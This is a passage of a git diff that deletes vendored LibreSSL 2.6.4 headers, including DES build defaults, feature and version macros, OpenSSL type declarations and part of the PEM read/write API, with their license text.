-/* These default values were supplied by
- * Peter Gutman <pgut001@cs.auckland.ac.nz>
- * They are only used if nothing else has been defined */
-#if !defined(DES_PTR) && !defined(DES_RISC1) && !defined(DES_RISC2) && !defined(DES_UNROLL)
-/* Special defines which change the way the code is built depending on the
-   CPU and OS.  For SGI machines you can use _MIPS_SZLONG (32 or 64) to find
-   even newer MIPS CPU's, but at the moment one size fits all for
-   optimization options.  Older Sparc's work better with only UNROLL, but
-   there's no way to tell at compile time what it is you're running on */
- 
-#if defined( sun )		/* Newer Sparc's */
-#  define DES_PTR
-#  define DES_RISC1
-#  define DES_UNROLL
-#elif defined( __ultrix )	/* Older MIPS */
-#  define DES_PTR
-#  define DES_RISC2
-#  define DES_UNROLL
-#elif defined( __osf1__ )	/* Alpha */
-#  define DES_PTR
-#  define DES_RISC2
-#elif defined ( _AIX )		/* RS6000 */
-  /* Unknown */
-#elif defined( __hpux )		/* HP-PA */
-  /* Unknown */
-#elif defined( __aux )		/* 68K */
-  /* Unknown */
-#elif defined( __dgux )		/* 88K (but P6 in latest boxes) */
-#  define DES_UNROLL
-#elif defined( __sgi )		/* Newer MIPS */
-#  define DES_PTR
-#  define DES_RISC2
-#  define DES_UNROLL
-#elif defined(i386) || defined(__i386__)	/* x86 boxes, should be gcc */
-#  define DES_PTR
-#  define DES_RISC1
-#  define DES_UNROLL
-#endif /* Systems-specific speed defines */
-#endif
-
-#endif /* DES_DEFAULT_OPTIONS */
-#endif /* HEADER_DES_LOCL_H */
diff --git a/thirdparty/libressl/include/openssl/opensslfeatures.h b/thirdparty/libressl/include/openssl/opensslfeatures.h
deleted file mode 100644
index ba4dbba..0000000
--- a/thirdparty/libressl/include/openssl/opensslfeatures.h
+++ /dev/null
@@ -1,26 +0,0 @@
-# define OPENSSL_NO_EC_NISTP_64_GCC_128
-# define OPENSSL_NO_CMS
-# define OPENSSL_NO_COMP
-# define OPENSSL_NO_EGD
-# define OPENSSL_NO_GMP
-# define OPENSSL_NO_JPAKE
-# define OPENSSL_NO_KRB5
-# define OPENSSL_NO_MD2
-# define OPENSSL_NO_MDC2
-# define OPENSSL_NO_PSK
-# define OPENSSL_NO_RC5
-# define OPENSSL_NO_RFC3779
-# define OPENSSL_NO_RSAX
-# define OPENSSL_NO_SCTP
-# define OPENSSL_NO_SEED
-# define OPENSSL_NO_SHA0
-# define OPENSSL_NO_SRP
-# define OPENSSL_NO_SSL2
-# define OPENSSL_NO_SSL3
-# define OPENSSL_NO_SSL3_METHOD
-# define OPENSSL_NO_STORE
-# define OPENSSL_NO_BUF_FREELISTS
-# define OPENSSL_NO_HEARTBEATS
-# define OPENSSL_NO_DYNAMIC_ENGINE
-
-# define OPENSSL_THREADS
diff --git a/thirdparty/libressl/include/openssl/opensslv.h b/thirdparty/libressl/include/openssl/opensslv.h
deleted file mode 100644
index c8dd39d..0000000
--- a/thirdparty/libressl/include/openssl/opensslv.h
+++ /dev/null
@@ -1,17 +0,0 @@
-/* $OpenBSD: opensslv.h,v 1.43.4.1 2017/12/11 10:50:37 bcook Exp $ */
-#ifndef HEADER_OPENSSLV_H
-#define HEADER_OPENSSLV_H
-
-/* These will change with each release of LibreSSL-portable */
-#define LIBRESSL_VERSION_NUMBER	0x2060400fL
-#define LIBRESSL_VERSION_TEXT	"LibreSSL 2.6.4"
-
-/* These will never change */
-#define OPENSSL_VERSION_NUMBER	0x20000000L
-#define OPENSSL_VERSION_TEXT	LIBRESSL_VERSION_TEXT
-#define OPENSSL_VERSION_PTEXT	" part of " OPENSSL_VERSION_TEXT
-
-#define SHLIB_VERSION_HISTORY ""
-#define SHLIB_VERSION_NUMBER "1.0.0"
-
-#endif /* HEADER_OPENSSLV_H */
diff --git a/thirdparty/libressl/include/openssl/ossl_typ.h b/thirdparty/libressl/include/openssl/ossl_typ.h
deleted file mode 100644
index b1a9e0e..0000000
--- a/thirdparty/libressl/include/openssl/ossl_typ.h
+++ /dev/null
@@ -1,190 +0,0 @@
-/* $OpenBSD: ossl_typ.h,v 1.13 2015/09/30 04:10:07 doug Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_OPENSSL_TYPES_H
-#define HEADER_OPENSSL_TYPES_H
-
-#include <openssl/opensslconf.h>
-
-typedef struct asn1_string_st ASN1_INTEGER;
-typedef struct asn1_string_st ASN1_ENUMERATED;
-typedef struct asn1_string_st ASN1_BIT_STRING;
-typedef struct asn1_string_st ASN1_OCTET_STRING;
-typedef struct asn1_string_st ASN1_PRINTABLESTRING;
-typedef struct asn1_string_st ASN1_T61STRING;
-typedef struct asn1_string_st ASN1_IA5STRING;
-typedef struct asn1_string_st ASN1_GENERALSTRING;
-typedef struct asn1_string_st ASN1_UNIVERSALSTRING;
-typedef struct asn1_string_st ASN1_BMPSTRING;
-typedef struct asn1_string_st ASN1_UTCTIME;
-typedef struct asn1_string_st ASN1_TIME;
-typedef struct asn1_string_st ASN1_GENERALIZEDTIME;
-typedef struct asn1_string_st ASN1_VISIBLESTRING;
-typedef struct asn1_string_st ASN1_UTF8STRING;
-typedef struct asn1_string_st ASN1_STRING;
-typedef int ASN1_BOOLEAN;
-typedef int ASN1_NULL;
-
-typedef struct ASN1_ITEM_st ASN1_ITEM;
-typedef struct asn1_pctx_st ASN1_PCTX;
-
-#if defined(_WIN32) && defined(__WINCRYPT_H__)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef X509_NAME
-#undef X509_CERT_PAIR
-#undef X509_EXTENSIONS
-#undef OCSP_REQUEST
-#undef OCSP_RESPONSE
-#undef PKCS7_ISSUER_AND_SERIAL
-#endif
-
-#ifdef BIGNUM
-#undef BIGNUM
-#endif
-typedef struct bignum_st BIGNUM;
-typedef struct bignum_ctx BN_CTX;
-typedef struct bn_blinding_st BN_BLINDING;
-typedef struct bn_mont_ctx_st BN_MONT_CTX;
-typedef struct bn_recp_ctx_st BN_RECP_CTX;
-typedef struct bn_gencb_st BN_GENCB;
-
-typedef struct buf_mem_st BUF_MEM;
-
-typedef struct evp_cipher_st EVP_CIPHER;
-typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX;
-typedef struct env_md_st EVP_MD;
-typedef struct env_md_ctx_st EVP_MD_CTX;
-typedef struct evp_pkey_st EVP_PKEY;
-
-typedef struct evp_pkey_asn1_method_st EVP_PKEY_ASN1_METHOD;
-
-typedef struct evp_pkey_method_st EVP_PKEY_METHOD;
-typedef struct evp_pkey_ctx_st EVP_PKEY_CTX;
-
-typedef struct dh_st DH;
-typedef struct dh_method DH_METHOD;
-
-typedef struct dsa_st DSA;
-typedef struct dsa_method DSA_METHOD;
-
-typedef struct rsa_st RSA;
-typedef struct rsa_meth_st RSA_METHOD;
-
-typedef struct rand_meth_st RAND_METHOD;
-
-typedef struct ecdh_method ECDH_METHOD;
-typedef struct ecdsa_method ECDSA_METHOD;
-
-typedef struct x509_st X509;
-typedef struct X509_algor_st X509_ALGOR;
-typedef struct X509_crl_st X509_CRL;
-typedef struct x509_crl_method_st X509_CRL_METHOD;
-typedef struct x509_revoked_st X509_REVOKED;
-typedef struct X509_name_st X509_NAME;
-typedef struct X509_pubkey_st X509_PUBKEY;
-typedef struct x509_store_st X509_STORE;
-typedef struct x509_store_ctx_st X509_STORE_CTX;
-
-typedef struct pkcs8_priv_key_info_st PKCS8_PRIV_KEY_INFO;
-
-typedef struct v3_ext_ctx X509V3_CTX;
-typedef struct conf_st CONF;
-
-typedef struct store_st STORE;
-typedef struct store_method_st STORE_METHOD;
-
-typedef struct ui_st UI;
-typedef struct ui_method_st UI_METHOD;
-
-typedef struct st_ERR_FNS ERR_FNS;
-
-typedef struct engine_st ENGINE;
-typedef struct ssl_st SSL;
-typedef struct ssl_ctx_st SSL_CTX;
-
-typedef struct X509_POLICY_NODE_st X509_POLICY_NODE;
-typedef struct X509_POLICY_LEVEL_st X509_POLICY_LEVEL;
-typedef struct X509_POLICY_TREE_st X509_POLICY_TREE;
-typedef struct X509_POLICY_CACHE_st X509_POLICY_CACHE;
-
-typedef struct AUTHORITY_KEYID_st AUTHORITY_KEYID;
-typedef struct DIST_POINT_st DIST_POINT;
-typedef struct ISSUING_DIST_POINT_st ISSUING_DIST_POINT;
-typedef struct NAME_CONSTRAINTS_st NAME_CONSTRAINTS;
-
-/* If placed in pkcs12.h, we end up with a circular depency with pkcs7.h */
-#define DECLARE_PKCS12_STACK_OF(type) /* Nothing */
-#define IMPLEMENT_PKCS12_STACK_OF(type) /* Nothing */
-
-typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
-/* Callback types for crypto.h */
-typedef int CRYPTO_EX_new(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
-    int idx, long argl, void *argp);
-typedef void CRYPTO_EX_free(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
-    int idx, long argl, void *argp);
-typedef int CRYPTO_EX_dup(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from,
-    void *from_d, int idx, long argl, void *argp);
-
-typedef struct ocsp_req_ctx_st OCSP_REQ_CTX;
-typedef struct ocsp_response_st OCSP_RESPONSE;
-typedef struct ocsp_responder_id_st OCSP_RESPID;
-
-#endif /* def HEADER_OPENSSL_TYPES_H */
diff --git a/thirdparty/libressl/include/openssl/pem.h b/thirdparty/libressl/include/openssl/pem.h
deleted file mode 100644
index d1916a1..0000000
--- a/thirdparty/libressl/include/openssl/pem.h
+++ /dev/null
@@ -1,618 +0,0 @@
-/* $OpenBSD: pem.h,v 1.17 2016/09/04 16:22:54 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_PEM_H
-#define HEADER_PEM_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#ifndef OPENSSL_NO_STACK
-#include <openssl/stack.h>
-#endif
-#include <openssl/evp.h>
-#include <openssl/x509.h>
-#include <openssl/pem2.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define PEM_BUFSIZE		1024
-
-#define PEM_OBJ_UNDEF		0
-#define PEM_OBJ_X509		1
-#define PEM_OBJ_X509_REQ	2
-#define PEM_OBJ_CRL		3
-#define PEM_OBJ_SSL_SESSION	4
-#define PEM_OBJ_PRIV_KEY	10
-#define PEM_OBJ_PRIV_RSA	11
-#define PEM_OBJ_PRIV_DSA	12
-#define PEM_OBJ_PRIV_DH		13
-#define PEM_OBJ_PUB_RSA		14
-#define PEM_OBJ_PUB_DSA		15
-#define PEM_OBJ_PUB_DH		16
-#define PEM_OBJ_DHPARAMS	17
-#define PEM_OBJ_DSAPARAMS	18
-#define PEM_OBJ_PRIV_RSA_PUBLIC	19
-#define PEM_OBJ_PRIV_ECDSA	20
-#define PEM_OBJ_PUB_ECDSA	21
-#define PEM_OBJ_ECPARAMETERS	22
-
-#define PEM_ERROR		30
-#define PEM_DEK_DES_CBC         40
-#define PEM_DEK_IDEA_CBC        45
-#define PEM_DEK_DES_EDE         50
-#define PEM_DEK_DES_ECB         60
-#define PEM_DEK_RSA             70
-#define PEM_DEK_RSA_MD2         80
-#define PEM_DEK_RSA_MD5         90
-
-#define PEM_MD_MD2		NID_md2
-#define PEM_MD_MD5		NID_md5
-#define PEM_MD_SHA		NID_sha
-#define PEM_MD_MD2_RSA		NID_md2WithRSAEncryption
-#define PEM_MD_MD5_RSA		NID_md5WithRSAEncryption
-#define PEM_MD_SHA_RSA		NID_sha1WithRSAEncryption
-
-#define PEM_STRING_X509_OLD	"X509 CERTIFICATE"
-#define PEM_STRING_X509		"CERTIFICATE"
-#define PEM_STRING_X509_PAIR	"CERTIFICATE PAIR"
-#define PEM_STRING_X509_TRUSTED	"TRUSTED CERTIFICATE"
-#define PEM_STRING_X509_REQ_OLD	"NEW CERTIFICATE REQUEST"
-#define PEM_STRING_X509_REQ	"CERTIFICATE REQUEST"
-#define PEM_STRING_X509_CRL	"X509 CRL"
-#define PEM_STRING_EVP_PKEY	"ANY PRIVATE KEY"
-#define PEM_STRING_PUBLIC	"PUBLIC KEY"
-#define PEM_STRING_RSA		"RSA PRIVATE KEY"
-#define PEM_STRING_RSA_PUBLIC	"RSA PUBLIC KEY"
-#define PEM_STRING_DSA		"DSA PRIVATE KEY"
-#define PEM_STRING_DSA_PUBLIC	"DSA PUBLIC KEY"
-#define PEM_STRING_PKCS7	"PKCS7"
-#define PEM_STRING_PKCS7_SIGNED	"PKCS #7 SIGNED DATA"
-#define PEM_STRING_PKCS8	"ENCRYPTED PRIVATE KEY"
-#define PEM_STRING_PKCS8INF	"PRIVATE KEY"
-#define PEM_STRING_DHPARAMS	"DH PARAMETERS"
-#define PEM_STRING_SSL_SESSION	"SSL SESSION PARAMETERS"
-#define PEM_STRING_DSAPARAMS	"DSA PARAMETERS"
-#define PEM_STRING_ECDSA_PUBLIC "ECDSA PUBLIC KEY"
-#define PEM_STRING_ECPARAMETERS "EC PARAMETERS"
-#define PEM_STRING_ECPRIVATEKEY	"EC PRIVATE KEY"
-#define PEM_STRING_PARAMETERS	"PARAMETERS"
-#define PEM_STRING_CMS		"CMS"
-
-  /* Note that this structure is initialised by PEM_SealInit and cleaned up
-     by PEM_SealFinal (at least for now) */
-typedef struct PEM_Encode_Seal_st {
-	EVP_ENCODE_CTX encode;
-	EVP_MD_CTX md;
-	EVP_CIPHER_CTX cipher;
-} PEM_ENCODE_SEAL_CTX;
-
-/* enc_type is one off */
-#define PEM_TYPE_ENCRYPTED      10
-#define PEM_TYPE_MIC_ONLY       20
-#define PEM_TYPE_MIC_CLEAR      30
-#define PEM_TYPE_CLEAR		40
-
-typedef struct pem_recip_st {
-	char *name;
-	X509_NAME *dn;
-
-	int cipher;
-	int key_enc;
-	/*	char iv[8]; unused and wrong size */
-} PEM_USER;
-
-typedef struct pem_ctx_st {
-	int type;		/* what type of object */
-
-	struct	{
-		int version;
-		int mode;
-	} proc_type;
-
-	char *domain;
-
-	struct	{
-		int cipher;
-	/* unused, and wrong size
-	   unsigned char iv[8]; */
-	} DEK_info;
-
-	PEM_USER *originator;
-
-	int num_recipient;
-	PEM_USER **recipient;
-
-	/* XXX(ben): don#t think this is used!
-		STACK *x509_chain;	/ * certificate chain */
-	EVP_MD *md;		/* signature type */
-
-	int md_enc;		/* is the md encrypted or not? */
-	int md_len;		/* length of md_data */
-	char *md_data;		/* message digest, could be pkey encrypted */
-
-	EVP_CIPHER *dec;	/* date encryption cipher */
-	int key_len;		/* key length */
-	unsigned char *key;	/* key */
-	/* unused, and wrong size
-	   unsigned char iv[8]; */
-
-	int  data_enc;		/* is the data encrypted */
-	int data_len;
-	unsigned char *data;
-} PEM_CTX;
-
-#ifndef LIBRESSL_INTERNAL
-/* These macros make the PEM_read/PEM_write functions easier to maintain and
- * write. Now they are all implemented with either:
- * IMPLEMENT_PEM_rw(...) or IMPLEMENT_PEM_rw_cb(...)
- */
-
-#define IMPLEMENT_PEM_read_fp(name, type, str, asn1) \
-type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u)\
-{ \
-return PEM_ASN1_read((d2i_of_void *)d2i_##asn1, str,fp,(void **)x,cb,u); \
-}
-
-#define IMPLEMENT_PEM_write_fp(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x) \
-{ \
-return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_fp_const(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, const type *x) \
-{ \
-return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,(void *)x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, \
-		  void *u) \
-	{ \
-	return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, \
-		  void *u) \
-	{ \
-	return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
-	}
-
-
-#define IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
-type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u)\
-{ \
-return PEM_ASN1_read_bio((d2i_of_void *)d2i_##asn1, str,bp,(void **)x,cb,u); \
-}
-
-#define IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x) \
-{ \
-return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, const type *x) \
-{ \
-return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
-	{ \
-	return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
-	{ \
-	return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_fp_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_cb(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_cb_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_read_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw_cb(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb(name, type, str, asn1)
-
-#endif
-
-/* These are the same except they are for the declarations */
-
-
-#define DECLARE_PEM_read_fp(name, type) \
-	type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u);
-
-#define DECLARE_PEM_write_fp(name, type) \
-	int PEM_write_##name(FILE *fp, type *x);
-
-#define DECLARE_PEM_write_fp_const(name, type) \
-	int PEM_write_##name(FILE *fp, const type *x);
-
-#define DECLARE_PEM_write_cb_fp(name, type) \
-	int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
-
-
-#ifndef OPENSSL_NO_BIO
-#define DECLARE_PEM_read_bio(name, type) \
-	type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u);
-
-#define DECLARE_PEM_write_bio(name, type) \
-	int PEM_write_bio_##name(BIO *bp, type *x);
-
-#define DECLARE_PEM_write_bio_const(name, type) \
-	int PEM_write_bio_##name(BIO *bp, const type *x);
-
-#define DECLARE_PEM_write_cb_bio(name, type) \
-	int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
-
-#else
-
-#define DECLARE_PEM_read_bio(name, type) /**/
-#define DECLARE_PEM_write_bio(name, type) /**/
-#define DECLARE_PEM_write_bio_const(name, type) /**/
-#define DECLARE_PEM_write_cb_bio(name, type) /**/
-
-#endif
-
-#define DECLARE_PEM_write(name, type) \
-	DECLARE_PEM_write_bio(name, type) \
-	DECLARE_PEM_write_fp(name, type)
-
-#define DECLARE_PEM_write_const(name, type) \
-	DECLARE_PEM_write_bio_const(name, type) \
-	DECLARE_PEM_write_fp_const(name, type)
-
-#define DECLARE_PEM_write_cb(name, type) \
-	DECLARE_PEM_write_cb_bio(name, type) \
-	DECLARE_PEM_write_cb_fp(name, type)
-
-#define DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_read_bio(name, type) \
-	DECLARE_PEM_read_fp(name, type)
-
-#define DECLARE_PEM_rw(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write(name, type)
-
-#define DECLARE_PEM_rw_const(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write_const(name, type)
-
-#define DECLARE_PEM_rw_cb(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write_cb(name, type)
-
-typedef int pem_password_cb(char *buf, int size, int rwflag, void *userdata);
-
-int	PEM_get_EVP_CIPHER_INFO(char *header, EVP_CIPHER_INFO *cipher);
-int	PEM_do_header (EVP_CIPHER_INFO *cipher, unsigned char *data, long *len,
-	    pem_password_cb *callback, void *u);
-
-#ifndef OPENSSL_NO_BIO
-int	PEM_read_bio(BIO *bp, char **name, char **header,
-	    unsigned char **data, long *len);
-int	PEM_write_bio(BIO *bp, const char *name, char *hdr, unsigned char *data,
-	    long len);
-int	PEM_bytes_read_bio(unsigned char **pdata, long *plen, char **pnm,
-	    const char *name, BIO *bp, pem_password_cb *cb, void *u);
-void *	PEM_ASN1_read_bio(d2i_of_void *d2i, const char *name, BIO *bp,
-	    void **x, pem_password_cb *cb, void *u);
-int	PEM_ASN1_write_bio(i2d_of_void *i2d, const char *name, BIO *bp, void *x,
-	    const EVP_CIPHER *enc, unsigned char *kstr, int klen,
-	    pem_password_cb *cb, void *u);
-
-STACK_OF(X509_INFO) *	PEM_X509_INFO_read_bio(BIO *bp,
-	    STACK_OF(X509_INFO) *sk, pem_password_cb *cb, void *u);
-int	PEM_X509_INFO_write_bio(BIO *bp, X509_INFO *xi, EVP_CIPHER *enc,
-	    unsigned char *kstr, int klen, pem_password_cb *cd, void *u);
-#endif
-
-int	PEM_read(FILE *fp, char **name, char **header,
-	    unsigned char **data, long *len);
-int	PEM_write(FILE *fp, char *name, char *hdr, unsigned char *data,
-	    long len);
-void *  PEM_ASN1_read(d2i_of_void *d2i, const char *name, FILE *fp, void **x,
-	    pem_password_cb *cb, void *u);
-int	PEM_ASN1_write(i2d_of_void *i2d, const char *name, FILE *fp,
-	    void *x, const EVP_CIPHER *enc, unsigned char *kstr,
-	    int klen, pem_password_cb *callback, void *u);
-STACK_OF(X509_INFO) *	PEM_X509_INFO_read(FILE *fp, STACK_OF(X509_INFO) *sk,
-	    pem_password_cb *cb, void *u);
-
-int	PEM_SealInit(PEM_ENCODE_SEAL_CTX *ctx, EVP_CIPHER *type,
-	    EVP_MD *md_type, unsigned char **ek, int *ekl,
-	    unsigned char *iv, EVP_PKEY **pubk, int npubk);
-void	PEM_SealUpdate(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *out, int *outl,
-	    unsigned char *in, int inl);
-int	PEM_SealFinal(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *sig, int *sigl,
-	    unsigned char *out, int *outl, EVP_PKEY *priv);
-
-void    PEM_SignInit(EVP_MD_CTX *ctx, EVP_MD *type);
-void    PEM_SignUpdate(EVP_MD_CTX *ctx, unsigned char *d, unsigned int cnt);
-int	PEM_SignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
-	    unsigned int *siglen, EVP_PKEY *pkey);
-
